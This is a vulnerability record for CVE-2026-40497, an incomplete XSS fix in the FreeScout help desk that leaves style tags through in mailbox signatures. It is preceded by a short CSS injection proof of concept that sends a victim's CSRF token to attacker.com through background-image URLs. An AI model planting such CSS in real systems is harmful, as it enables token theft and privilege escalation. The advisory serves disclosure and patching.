CVE-2026-40497

<style> /* CSS Injection PoC to exfiltrate CSRF token */ /* Targeting the CSRF token input field by name */ input[name="_token"] { /* Exfiltrate the token value via background image request */ background-image: url("https://attacker.com/steal?token=" attr(value)); } /* Alternative: Exfiltrate via generic attribute selector if value is not directly accessible */ [data-csrf] { background-image: url("https://attacker.com/steal?token=" attr(data-csrf)); } </style>

{"cve": {"id": "CVE-2026-40497", "sourceIdentifier": "[email protected]", "published": "2026-04-21T03:16:08.403", "lastModified": "2026-04-23T16:32:04.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, FreeScout's `Helper::stripDangerousTags()` removes `<script>`, `<form>`, `<iframe>`, `<object>` but does NOT strip `<style>` tags. The mailbox signature field is saved via POST /mailbox/settings/{id} and later rendered unescaped via `{!! $conversation->getSignatureProcessed([], true) !!}` in conversation views. CSP allows `style-src * 'self' 'unsafe-inline'`, so injected inline styles execute freely. An attacker with access to mailbox settings (admin or agent with mailbox permission) can inject CSS attribute selectors to exfiltrate the CSRF token of any agent/admin who views a conversation in that mailbox. With the CSRF token, the attacker can perform any state-changing action as the victim (create admin accounts, change email/password, etc.) — privilege escalation from agent to admin. This is the result of an incomplete fix of GHSA-jqjf-f566-485j. That advisory reported XSS via mailbox signature. The fix applied `Helper::stripDangerousTags()` to the signature before saving. However, `stripDangerousTags()` only removes `script`, `form`, `iframe`, and `object` tags — it does NOT strip `<style>` tags, leaving CSS injection possible. Version 1.8.213 contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:freescout:freescout:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.213", "matchCriteriaId": "EA97ED0A-4886-4583-9D20-47BE39C40B01"}]}]}], "references": [{"url": "https://github.com/freescout-help-desk/freescout/commit/5aa8d633216f65995e80a7d4a921b784acc94df4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/freescout-help-desk/freescout/releases/tag/1.8.213", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-fh99-wr77-pxq3", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-fh99-wr77-pxq3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}